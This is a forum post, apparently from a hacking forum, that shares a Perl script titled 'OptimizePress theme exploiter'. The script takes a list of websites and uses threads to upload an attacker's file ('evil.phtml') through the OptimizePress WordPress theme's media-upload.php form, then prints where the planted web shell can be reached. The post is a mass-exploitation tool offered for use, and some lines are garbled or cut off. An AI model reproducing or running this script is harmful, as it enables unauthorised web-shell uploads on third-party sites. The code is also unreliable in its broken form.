Perl OptimizePress theme exploiter

[sQuo]

OptimizePress theme exploiter

[HIDE-THANKS]

># OptimizePress theme exploiter
# (c) sec4ever.com
use WWW::Mechanize;
use threads;
defined($ARGV[0] && $ARGV[1] && $ARGV[2]) ? $file = $ARGV[0] : die "+ usage: perl $0 sites.txt evil.phtml threads\n";
print "[+] sec4ever.com\n";
$evil = $ARGV[1];
$thr = $ARGV[2];
open(sites,"while($site = )
{
chomp($site);
$site = cleanurl($site);
push(@threads, threads->create (\&ex, $site));
sleep(1) while(scalar threads->list(threads::running) >= $thr);
}
eval {
$_->join foreach @threads;
@threads = ();
};
close(sites);
sub ex {
print " + $site | ";
eval{
$ex = WWW::Mechanize->new(timeout => 10);
$ex->get("http://".$_[0]."/wp-content/themes/OptimizePress/lib/admin/media-upload.php");
$ex->submit_form(
form_id => "csimgupload",
fields => {
newcsimg => $evil
});
};
if($ex->content() =~ /{
print "shell: ".$1.$ARGV[1]."\n";
}else{
print "faild\n";
}
}
sub cleanurl {
$_[0] =~ /http[s]?:\/\/[www\.]{3}?[\.]?/g ? $_[0] =~ s/http[s]?:\/\/[www\.]{3}?[\.]?//g : "";
$_[0] =~ /http[s]?:\/\//g ? $_[0] =~ s/http[s]?:\/\///g : "";
$_[0] =~ /[\/]$/m ? $_[0] =~ s/[\/]$// : "";
return $_[0];
}

[/HIDE-THANKS]